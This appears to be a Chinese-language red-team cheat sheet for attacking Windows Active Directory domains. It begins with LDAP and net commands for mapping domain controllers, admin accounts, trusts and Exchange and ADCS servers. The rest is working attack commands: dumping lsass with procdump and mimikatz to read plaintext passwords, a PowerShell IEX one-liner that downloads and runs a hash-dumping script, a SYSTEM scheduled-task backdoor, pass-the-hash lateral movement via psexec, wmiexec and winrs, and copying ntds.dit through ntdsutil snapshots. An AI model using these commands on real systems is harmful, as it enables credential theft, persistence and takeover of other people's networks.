信息收集基础命令
查询域控制器主机名
net group "domain controllers" /domain
ldapsearch -x -H ldap://192.168.164.174 -D "user1@test.com" -b "OU=Domain Controllers,DC=test,DC=com" -w Uu1234. "(sAMAccountType=805306369)"|grep dNSHostName
查询域管理用户
net group "domain admins" /domain
ldapsearch -x -H ldap://192.168.164.174 -D "user1@test.com" -b "CN=Domain Admins,CN=users,DC=test,DC=com" -w Uu1234. "(member=*)"|grep member:
查看所有域用户
net user /domain
ldapsearch -x -H ldap://192.168.164.174 -D "user1@test.com" -b "CN=Users,DC=test,DC=com" -w Uu1234. "(sAMAccountType=805306368)"|grep sAMAccountName
查看加入域的所有计算机名
net group "domain computers" /domain
ldapsearch -x -H ldap://192.168.164.174 -D "user1@test.com" -b "CN=Computers,DC=test,DC=com" -w Uu1234. "(sAMAccountType=805306369)"|grep dNSHostName
查看域密码策略
net accounts /domain
查看域信任关系
nltest /domain_trusts /all_trusts /v /server:xx.xx.xx.xx
powershell ([System.DirectoryServices.ActiveDirectory.Forest]::GetForest((New-object System.DirectoryServices.ActiveDirectory.DirectoryContext('Forest','test.com')))).GetAllTrustRelationships()
ldapsearch -x -H ldap://192.168.164.174 -D "user1@test.com" -b "DC=test,DC=com" -w Uu1234. "(objectClass=trustedDomain)"|grep trustPartner:
查看信任方向
ldapsearch -x -H ldap://192.168.164.174 -D "user1@test.com" -b "DC=test,DC=com" -w Uu1234. "(objectClass=trustedDomain)"|grep trustDirection:
trustDirection=1 | trustDirection=2 | trustDirection=3 |
---|---|---|
受信任的域信任主域执行操作 | 主域信任受信任的域执行操作 | 相互信任 |
在nltest中
Inbound | Outbound |
---|---|
受信任的域信任主域执行操作 | 主域信任受信任的域执行操作 |
定位exchange服务器
ldapsearch -x -H ldap://192.168.164.174 -D "user1@test.com" -b "CN=Exchange Servers,OU=Microsoft Exchange Security Groups,DC=test,DC=com" -w Uu1234. "(sAMAccountType=268435456)"|grep member
setspn -q exchangemdb/*
定位adcs服务
ldapsearch -x -H ldap://192.168.164.146 -D "user1@test.com" -b "CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=Configuration,DC=test,DC=com" -w Uu1234. "(objectCategory=pKIEnrollmentService)"|grep dNSHostName
常用工具
使用procdump将目标的lsass.exe转储成dmp文件
procdump64.exe -accepteula -ma lsass.exe lsass.dmp
使用mimikatz从转储的lsass.dmp中来读取明文密码
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" "exit"
使用powershell无文件落地
powershell IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Get-PassHashes.ps1’);Get-PassHashes
利用ipc$连接获得shell
net use \192.168.91.131\IPC$ /user:"administrator" "abc@123"
copy D:\test.bat \192.168.91.131\c$
计划任务后门
schtasks /create /s 192.168.91.131 /u Administrator /p Admin@123.. /ru "SYSTEM" /tn test /sc DAILY /st 22:18 /tr C:\windows\temp\test.bat /F
创建计划任务：/s 指定目标主机，/u 和 /p 指定认证凭据，/ru 指定任务运行身份，/tn 是任务名称，/sc 是任务运行频率（这里指定为每天运行），/st 是启动时间，/tr 指定运行的文件，/F 表示强制创建任务，/i 表示立即执行
使用psexec
psexec.exe admin@10.73.147.30 -hashes 624aac413795cdc1a5c7b1e00f780017:852a844adfce18f66009b4f14e0a98de -accepteula
python psexec.py administrator@10.73.147.29 -hashes 624aac413795cdc1a5c7b1e00f780017:852a844adfce18f66009b4f14e0a98de
python psexec.py domain.com/administrator:password@10.73.147.29
wmiexec
python wmiexec.py -hashes 624aac413795cdc1a5c7b1e00f780017:852a844adfce18f66009b4f14e0a98de administrator@10.73.147.29
wmic /node:10.73.147.29 /user:Administrator /password:Admin@123.. process call create "cmd.exe /c ipconfig"
winrm
winrs -r:http://10.73.147.29:5985 -u:Administrator -p:Admin@123.. "whoami /all"
winrs -r:http://10.73.147.29:5985 -u:Administrator -p:Admin@123.. "cmd.exe"
在域控导出hash
创建快照
ntdsutil snapshot "activate instance ntds" create quit quit
加载快照
ntdsutil snapshot "mount {72ba82f0-5805-4365-a73c-0ccd01f5ed0d}" quit quit
从快照中复制文件副本
copy C:\$SNAP_201911211122_VOLUMEC$\windows\NTDS\ntds.dit c:\ntds.dit
卸载删除快照
ntdsutil snapshot "unmount {72ba82f0-5805-4365-a73c-0ccd01f5ed0d}" quit quit
ntdsutil snapshot "delete {72ba82f0-5805-4365-a73c-0ccd01f5ed0d}" quit quit